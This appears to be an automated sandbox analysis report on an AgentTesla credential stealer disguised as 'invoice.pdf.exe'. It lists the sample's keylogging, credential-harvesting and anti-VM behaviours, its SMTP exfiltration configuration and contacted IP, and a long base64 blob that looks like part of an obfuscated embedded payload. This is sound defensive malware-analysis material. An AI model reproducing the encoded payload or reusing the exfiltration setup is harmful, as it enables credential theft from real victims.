Play interactive tour

Edit tour

Analysis Report invoice.pdf.exe

Overview

General Information

Sample Name:	invoice.pdf.exe
Analysis ID:	358190
MD5:	d3bb643f07aee4cc6be3d303222bd2c9
SHA1:	a5804c4525cb33a8eb1a4c534e9da3824a826980
SHA256:	4e49cd4c9abc7a87bd4da347a31454701ab005bf1f9d9295b9f16de4353f56dc
Tags:	AgentTeslaexe
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains very large array initializations

.NET source code contains very large strings

Executable has a suspicious name (potential lure to open the executable)

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for sample

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Uses an obfuscated file name to hide its real file extension (double extension)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

invoice.pdf.exe (PID: 6496 cmdline: 'C:\Users\user\Desktop\invoice.pdf.exe' MD5: D3BB643F07AEE4CC6BE3D303222BD2C9)

invoice.pdf.exe (PID: 6580 cmdline: C:\Users\user\Desktop\invoice.pdf.exe MD5: D3BB643F07AEE4CC6BE3D303222BD2C9)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "FTP Info": "nasir@com-cept.comkhan@980.pkmail.com-cept.comlight@redwevamaldives.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.241020858.0000000003701000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.508855968.0000000003B2E000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.501365134.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: invoice.pdf.exe PID: 6496	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: invoice.pdf.exe PID: 6496	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: invoice.pdf.exe PID: 6580	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: invoice.pdf.exe PID: 6580	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.invoice.pdf.exe.39bf710.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.invoice.pdf.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.invoice.pdf.exe.39bf710.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.invoice.pdf.exe.27287c8.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
1.2.invoice.pdf.exe.38c2460.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.invoice.pdf.exe.3866c40.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Double Extension

Show sources

Source: Process started

Author: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\Desktop\invoice.pdf.exe, CommandLine: C:\Users\user\Desktop\invoice.pdf.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\invoice.pdf.exe, NewProcessName: C:\Users\user\Desktop\invoice.pdf.exe, OriginalFileName: C:\Users\user\Desktop\invoice.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\invoice.pdf.exe' , ParentImage: C:\Users\user\Desktop\invoice.pdf.exe, ParentProcessId: 6496, ProcessCommandLine: C:\Users\user\Desktop\invoice.pdf.exe, ProcessId: 6580

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.invoice.pdf.exe.39bf710.3.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "FTP Info": "nasir@com-cept.comkhan@980.pkmail.com-cept.comlight@redwevamaldives.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: invoice.pdf.exe	Virustotal: Detection: 34%			Perma Link
Source: invoice.pdf.exe	ReversingLabs: Detection: 21%

Machine Learning detection for sample

Show sources

Source: invoice.pdf.exe

Joe Sandbox ML: detected

Source: 2.2.invoice.pdf.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files

Show sources

Source: invoice.pdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses new MSVCR Dlls

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: invoice.pdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:

Binary string: mscorrc.pdb source: invoice.pdf.exe, 00000001.00000002.244986843.0000000007A10000.00000002.00000001.sdmp, invoice.pdf.exe, 00000002.00000002.502816545.0000000001590000.00000002.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h		1_2_048ECE80
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h		1_2_048ECE71

Networking:

Source: global traffic

TCP traffic: 192.168.2.7:49748 -> 185.221.216.77:587

Source: Joe Sandbox View

ASN Name: HOST4GEEKS-LLCUS HOST4GEEKS-LLCUS

Source: global traffic

TCP traffic: 192.168.2.7:49748 -> 185.221.216.77:587

Source: C:\Users\user\Desktop\invoice.pdf.exe

Code function: 2_2_016BA09A recv,

2_2_016BA09A

Source: unknown

DNS traffic detected: queries for: mail.com-cept.com

Source: invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	String found in binary or memory: http://HtsCZk.com
Source: invoice.pdf.exe, 00000002.00000002.507278003.0000000003719000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: invoice.pdf.exe, 00000002.00000002.507278003.0000000003719000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: invoice.pdf.exe, 00000002.00000002.507278003.0000000003719000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: invoice.pdf.exe	String found in binary or memory: http://inchat.kro.kr
Source: invoice.pdf.exe, 00000002.00000002.507278003.0000000003719000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: invoice.pdf.exe	String found in binary or memory: http://schooldb.inchat.kro.kr/
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: invoice.pdf.exe, 00000001.00000003.233981816.0000000004B84000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coma
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comang
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comati
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comd
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comeac
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comechP
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comext
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com.TTFnO
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comAO
Source: invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: invoice.pdf.exe, 00000001.00000003.239621781.0000000004B75000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdiaoJO
Source: invoice.pdf.exe, 00000001.00000003.239621781.0000000004B75000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comeO
Source: invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comessedwO
Source: invoice.pdf.exe, 00000001.00000003.239621781.0000000004B75000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comgrita$OX
Source: invoice.pdf.exe, 00000001.00000003.236081460.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comituF$OX
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: invoice.pdf.exe, 00000001.00000003.233778392.0000000004B89000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/tN
Source: invoice.pdf.exe	String found in binary or memory: http://www.gagalive.kr/livechat1.swf?chatroom=inchat-
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/$OX
Source: invoice.pdf.exe, 00000001.00000003.234841586.0000000004B78000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-OQ
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/6OJ
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ConnAO
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/JO
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0anSO7
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/eO
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/-OQ
Source: invoice.pdf.exe, 00000001.00000003.234841586.0000000004B78000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/JO
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/nO
Source: invoice.pdf.exe, 00000001.00000003.234841586.0000000004B78000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/on
Source: invoice.pdf.exe, 00000001.00000003.235152791.0000000004B7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: invoice.pdf.exe, 00000001.00000003.234841586.0000000004B78000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/vv
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: invoice.pdf.exe, 00000001.00000002.244593418.0000000005D82000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	String found in binary or memory: https://MFtHNrHfTnJ.net
Source: invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: invoice.pdf.exe, 00000002.00000002.507278003.0000000003719000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: invoice.pdf.exe, 00000001.00000002.241020858.0000000003701000.00000004.00000001.sdmp, invoice.pdf.exe, 00000002.00000002.501365134.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: invoice.pdf.exe, 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\invoice.pdf.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\invoice.pdf.exe

Jump to behavior

Source: C:\Users\user\Desktop\invoice.pdf.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 2.2.invoice.pdf.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b44CD734Eu002d2649u002d4744u002d9F1Cu002dD226F20A8433u007d/u0038ABCE9BFu002d8479u002d4ACEu002dB8D6u002d55CC5848CE0F.cs

Large array initialization: .cctor: array initializer size 11976

.NET source code contains very large strings

Show sources

Source: invoice.pdf.exe, frmLogin.cs	Long String: Length: 13656
Source: 1.0.invoice.pdf.exe.b0000.0.unpack, frmLogin.cs	Long String: Length: 13656
Source: 1.2.invoice.pdf.exe.b0000.0.unpack, frmLogin.cs	Long String: Length: 13656
Source: 2.0.invoice.pdf.exe.f80000.0.unpack, frmLogin.cs	Long String: Length: 13656
Source: 2.2.invoice.pdf.exe.f80000.1.unpack, frmLogin.cs	Long String: Length: 13656

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: invoice.pdf.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample	Static PE information: Filename: invoice.pdf.exe
Source: initial sample	Static PE information: Filename: invoice.pdf.exe

Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_016BB0BA NtQuerySystemInformation,		2_2_016BB0BA
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_016BB089 NtQuerySystemInformation,		2_2_016BB089

Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_000BAC81	1_2_000BAC81
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E4890	1_2_048E4890
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048EB0A9	1_2_048EB0A9
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E4688	1_2_048E4688
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E1AE0	1_2_048E1AE0
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E81AE	1_2_048E81AE
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E55B0	1_2_048E55B0
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E4687	1_2_048E4687
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E1AD1	1_2_048E1AD1
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048EBF88	1_2_048EBF88
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048EBF98	1_2_048EBF98
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E33D8	1_2_048E33D8
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E33E8	1_2_048E33E8
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E5368	1_2_048E5368
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_048E5367	1_2_048E5367
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 1_2_000BAF8E	1_2_000BAF8E
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_00F8AC81	2_2_00F8AC81
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_01A09690	2_2_01A09690
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_01A07A94	2_2_01A07A94
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_01A09248	2_2_01A09248
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_0632D220	2_2_0632D220
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_06320666	2_2_06320666
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_06327B98	2_2_06327B98
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_0632F3F8	2_2_0632F3F8
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_0632BDE0	2_2_0632BDE0
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_0632DE59	2_2_0632DE59
Source: C:\Users\user\Desktop\invoice.pdf.exe	Code function: 2_2_00F8AF8E	2_2_00F8AF8E

Source: invoice.pdf.exe, 00000001.00000002.244986843.0000000007A10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000001.00000002.241020858.0000000003701000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000001.00000002.241020858.0000000003701000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamexFMBnjPOeEEgNCcCePpgxKGYA.exe4 vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000001.00000000.231958724.000000000012A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTRACEQUERYINFOCLASS.exe. vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000002.00000002.509901766.0000000006300000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx.mui vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000002.00000000.239232223.0000000000FFA000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTRACEQUERYINFOCLASS.exe. vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000002.00000002.509433781.0000000005A40000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000002.00000002.503556333.000000000177A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamemscorwks.dllT vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000002.00000002.502816545.0000000001590000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs invoice.pdf.exe
Source: invoice.pdf.exe, 00000002.00000002.501365134.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamexFMBnjPOeEEgNCcCePpgxKGYA.exe4 vs invoice.pdf.exe
Source: invoice.pdf.exe	Binary or memory string: OriginalFilenameTRACEQUERYINFOCLASS.exe. vs invoice.pdf.exe

Source: C:\Users\user\Desktop\invoice.pdf.exe

Section loaded: security.dll

Jump to behavior

Source: invoice.pdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: invoice.pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 2.2.invoice.pdf.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.2.invoice.pdf.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: invoice.pdf.exe, frmLogin.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXN